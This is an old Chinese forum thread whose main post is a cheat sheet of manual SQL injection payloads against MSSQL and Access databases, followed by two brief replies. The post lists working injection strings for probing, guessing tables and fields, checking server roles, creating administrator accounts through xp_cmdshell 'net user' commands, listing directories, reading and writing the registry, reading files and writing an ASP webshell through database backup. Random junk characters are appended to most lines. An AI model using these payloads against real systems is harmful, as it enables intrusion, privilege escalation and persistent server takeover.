社区应用 最新帖子 精华区 社区服务 会员列表 统计排行 社区论坛任务 迷你宠物
  • 5041阅读
  • 2回复

手动方式SQL注入脚本命令

级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
1.判断是否有注入;and 1=1 ;and 1=2 h^ -. ]Y  
  2.初步判断是否是mssql ;and user>0 Y(\T- bI  
)BfT7{WN  
  3.注入参数是字符'and [查询条件] and ''=' ^kS T  
.(J?a"  
  4.搜索时没过滤参数的'and [查询条件] and '%25'=' {0! ~C=P  
bYz&P`o}  
  5.判断数据库系统 ZoKcJA  
~&\ f|%  
  ;and (select count(*) from sysobjects)>0 mssql H+ h07\? %  
x8;`i$  
  ;and (select count(*) from msysobjects)>0 access m/NdJMoN=  
3] 1-M  
OB ~X/  
"O8gJ0e  
  6.猜数据库 ;and (select Count(*) from [数据库名])>0 IV lf=k  
E7Cy(LO  
  7.猜字段 ;and (select Count(字段名) from 数据库名)>0 +UJuB  
_C\[DR0n  
  8.猜字段中记录长度 ;and (select top 1 len(字段名) from 数据库名)>0 zI~owK)%Z  
47r_y\U h  
  9.(1)猜字段的ascii值(access) g%u&Zkevx  
`OymAyEYQ  
  ;and (select top 1 asc(mid(字段名,1,1)) from 数据库名)>0 ~}K5#<   
8q`$y$06Dk  
  (2)猜字段的ascii值(mssql) K78rg/`  
86f2'o+  
  ;and (select top 1 unicode(substring(字段名,1,1)) from 数据库名)>0 X-Wz:NA  
*&Z7m^`FQ  
  10.测试权限结构(mssql) fC}R4f7C  
L6>pGx  
,G#.BLH cX  
*5<Sr q'  
  ;and 1=(select IS_SRVROLEMEMBER('sysadmin'));-- 1 nvTce  
cI]WrI2CQa  
  ;and 1=(select IS_SRVROLEMEMBER('serveradmin'));-- ?Qb<-~~ j1  
@\&m+;6  
  ;and 1=(select IS_SRVROLEMEMBER('setupadmin'));-- smG>sEp2  
_2btfY1U  
  ;and 1=(select IS_SRVROLEMEMBER('securityadmin'));-- ;,&8QcSVY  
&[2U$`P`V  
  ;and 1=(select IS_SRVROLEMEMBER('diskadmin'));-- iJnU%  
uP\lCqK,  
  ;and 1=(select IS_SRVROLEMEMBER('bulkadmin'));-- Pmi#TW3X  
/~4 "No@  
  ;and 1=(select IS_MEMBER('db_owner'));-- (;VVC Aoy  
&'l>rD^o  
-T6(hT\  
K/ &?VIi`z  
  11.添加mssql和系统的帐户 y/V%&.$o=  
GRy-+#,b"  
  ;exec master.dbo.sp_addlogin username;-- =66Nw(E.  
  ;exec master.dbo.sp_password null,username,password;-- {{C`mgC  
::n;VY2&  
  ;exec master.dbo.sp_addsrvrolemember sysadmin username;-- Y32O-I!9u  
4/ X/>Y1  
  ;exec master.dbo.xp_cmdshell 'net user username password vd`}/~o  
@H!$[m3  
  /workstations:*/times:all/passwordchg:yes /passwordreq:yes /active:yes /add';-- Gu=STb  
E{HY!L[  
  ;exec master.dbo.xp_cmdshell 'net user username password /add';-- q P ;A}C  
H"2uxhdLK3  
  ;exec master.dbo.xp_cmdshell 'net localgroup administrators username /add';-- F_xbwa*=  
#S%Q*k<hw  
8+m H:O  
S' dV>m`  
  12.(1)遍历目录 E&yD8=vw  
crO@?m1  
  ;create table dirs(paths varchar(100), id int) fAZiC+  
sBv>E}*R  
  ;insert dirs exec master.dbo.xp_dirtree 'c:\' A?G IBjs  
4`#F^2r!  
  ;and (select top 1 paths from dirs)>0 vi@Lz3}::  
39 {{7(hh  
  ;and (select top 1 paths from dirs where paths not in('上步得到的paths'))>) B7\k< Nit0  
k7tYa;C  
.^) UO  
2!N8rHRt  
  (2)遍历目录 rzp +:  
,mPnQ?  
  ;create table temp(id nvarchar(255),num1 nvarchar(255),num2 nvarchar(255),num3 nvarchar(255));-- Oo?,fw  
  ;insert temp exec master.dbo.xp_availablemedia;-- 获得当前所有驱动器 4E44Hzs  
Y+/JsOD  
  ;insert into temp(id) exec master.dbo.xp_subdirs 'c:\';-- 获得子目录列表 D .vw8H3  
E2GGEKrW  
  ;insert into temp(id,num1) exec master.dbo.xp_dirtree 'c:\';-- 获得所有子目录的目录树构 K!D o8|  
{f9{8-W <u  
  ;insert into temp(id) exec master.dbo.xp_cmdshell 'type c:\web\index.asp';-- 查看文件的内容 0oy-os  
jClj_E  
7\o!HMfK  
[6jbgW~E  
  13.mssql中的存储过程 ch5s<x#CE  
>]'yK!a?  
  xp_regenumvalues 注册表根键, 子键 9*6]&:fm  
\qsw"B*tv`  
  ;exec xp_regenumvalues 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run' 以多个记录集方式返回所有键值 dBO@6*N4c  
TEUY3z[g  
  xp_regread 根键,子键,键值名 KlK`;cr?  
U=bEA1*@0  
  ;exec xp_regread eMK+X \  
TG n-7 88  
  'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','CommonFilesDir' 返回制定键的值 VcK}2<8:+~  
g%[n4  
  xp_regwrite 根键,子键, 值名, 值类型, 值 /8@m<CW2Y  
h5 Vv:C  
  值类型有2种REG_SZ 表示字符型,REG_DWORD 表示整型 +b;hBb]R  
^s\3/z>b4!  
  ;exec xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName','reg_sz','hello' 写入注册表 ^"8G`B$r  
{#IPf0O  
  xp_regdeletevalue 根键,子键,值名 {|9}+ @5Q1  
4t4olkK3Oa  
  exec xp_regdeletevalue 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion','TestValueName' 删除某个值 QD{:vG g  
6]Q3Yz^h  
  xp_regdeletekey 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Testkey' 删除键,包括该键下所有值 FDR1 Gy  
dAJ,x =`  
'+<(;2Z vL  
nW\(IkX\  
  14.mssql的backup创建webshell ;%J5=f%z)  
89o)M5KQ  
  use model t?;T3k[RM  
4X NxI1w)  
  create table cmd(str image); [%HIbw J  
,]R8(bD)  
  insert into cmd(str) values (''); fYebB7Pv  
eT"Uxhs-}  
  backup database model to disk='c:\l.asp'; O`FqD{@V  
OH<?DcfeL  
T0j2a &Pv  
3L-^<'~-k;  
  15.mssql内置函数 jW*1E *"  
:ZdUx  
  ;and (select @@version)>0 获得Windows的版本号 ~Pk0u{,4XQ  
%R_{1GrL'c  
  ;and user_name()='dbo' 判断当前系统的连接用户是不是sa m$>iS@R  
EruP  
  ;and (select user_name())>0 爆当前系统的连接用户 ,KW;2t*IQ@  
Hv#q:R8  
  ;and (select db_name())>0 得到当前连接的数据库 9T2xU3UyY  
?y},,  
(k-YI{D3  
uK*Nu^  
  16.简洁的webshell BpAB5=M0  
B7Ntk MK  
  use model Z\X'd_1!  
qZ2&Xw.{1  
  create table cmd(str image); ScnY3&rc  
~>ME'D~  
  insert into cmd(str) values (''); %@& a7JOL  
{I%y;Aab8  
  backup database model to disk='g:\wwwtest\l.asp';
评价一下你浏览此帖子的感受

精彩

感动

搞笑

开心

愤怒

无聊

灌水
级别: 经院博士
发帖
3975
铜板
4727
人品值
1147
贡献值
565
交易币
0
好评度
3833
信誉值
0
金币
0
所在楼道
学一楼
只看该作者 1 发表于: 2006-08-31
学习.......... 呵呵 我是好人
引用

引用
想找我?如果我即不在 石家庄经济学院论坛www.uebbs.net,也不在宿舍,那,我肯定是在去的路上

引用
级别: 终身会员
发帖
3743
铜板
8
人品值
493
贡献值
9
交易币
0
好评度
3746
信誉值
0
金币
0
所在楼道
只看该作者 2 发表于: 2006-08-31
这个和好人有关系吗?
描述
快速回复

您目前还是游客,请 登录注册
批量上传需要先选择文件,再选择上传
认证码:
验证问题:
3+5=?,请输入中文答案:八 正确答案:八